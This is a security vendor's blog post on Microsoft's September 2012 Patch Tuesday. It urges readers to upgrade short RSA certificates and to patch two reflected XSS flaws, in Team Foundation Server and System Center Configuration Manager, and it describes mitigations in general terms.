Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

Microsoft Patch Tuesday September 2012 – Update those Certs!

As we mentioned last week there are only two patches thismonth! Not to mention they are only rated 'Important' and not 'Critical' whichis great since it means less work for all of us but that doesn't mean you shouldn't apply them if needed. So few patches means you can focus more on the optional (thismonth) non-security update (KB2661254). This update was firstreleased last month but just about everyone ignored it then. KB2661254 willrequire users to employ certificates with an RSA key length of at least 1024 bits.Which for most of us shouldn't be that big of a deal as you really should bealready using 1024 bit certs as a minimum by now anyway. But there are at least1% of you out there, according to the 2012 Trustwave Global Security Report that are still 1using 512-bitcertificates! While you are in the process of updating those old certs, and youhave all this extra time this month from only needing to apply two patches, youmight as well update your 1024 bit certs to a even more robust 2048 bits, 4096bits or higher.

There has been a lot of nasty malware out lately usingspoofed certs, like the recent Flame malware. So while you have a little extra time this month root around in the backof your IT closet for that old server that never gets touched because "it justworks" you know the one, the one you avoid, the one in the corner that theother department is protective about, the one that lives under that one guysdesk, yeah that one. Go update it. If youare still using IIS 5 and 6 and not using Certificate Revocation Lists now would bea good time enable that feature, it is on by default in IIS 7.

Be warned though that updating key lengths might cause someerror messages and will definitely require a reboot. Just because updating yourkey lengths is optional this month doesn't mean you should ignore it or put itoff any longer than you need to because next month it will be required andstuff will start breaking if you don't have this update. Things like InternetExplorer tossing up error messages to your visitors saying your certs areuntrusted. Things like Outlook not being able to encrypt or even sign email.Those issues are nothing though when you realize that Outlook 2010 won't evenbe able to connect to an Exchange Server using a cert with less than 1024 bits.So save yourself some headaches next month and update those key lengths now.

MS12-061 (KB 2719584)


Elevation of Privilegein Visual Studio Team Foundation Server


Visual Studio Team Foundation Server allows users to easily share project plans, work products, andprogress assessments and a whole bunch of other stuff. There is areflected XSS (Cross Site Scripting) vulnerability though that could allow abad guy to inject a client side script into a web browser that is using TeamFoundation Server web access. Basically that would allow the bad guy increasedprivileges if a user clicks a specially crafted link in an email or on awebsite. Once the script is installed the bad guy could then spoof content,steal information or do anything that the original user could do. If for some reason you can't apply this patchat the very least you should enable the XSS filter in local intranet securityzone for IE 8 and 9. You can find this from the Tools menu -> Security Tab-> Local intranet -> Custom Level -> Settings -> Scripting ->Enable XSS filter. But it is so much easier to just apply the patch.

MS12-062 (KB 2741528)


Elevation of Privilegein System Center Configuration Manager


System Center Configuration Manager helps organizationsmaintain corporate compliance by managing physical, virtual, and mobileclients with things like application delivery, desktop virtualization, securityand other cool stuff. However there is a vulnerability that can be exploited bytricking a user into visiting a specially crafted URL. Like MS12-061 this oneis also a reflected XSS vulnerability, which could allow the bad guys code torun. Again if you can't install this patch be sure to at least enable the XSSfilter in IE 8 and 9.

Researchers at Trustwave Spiderlabs areactively investigating these bulletins thoroughly, using the information fromMicrosoft and other sources to develop protections for our customers againstthese threats as quickly as we can.

Now, go update those certs!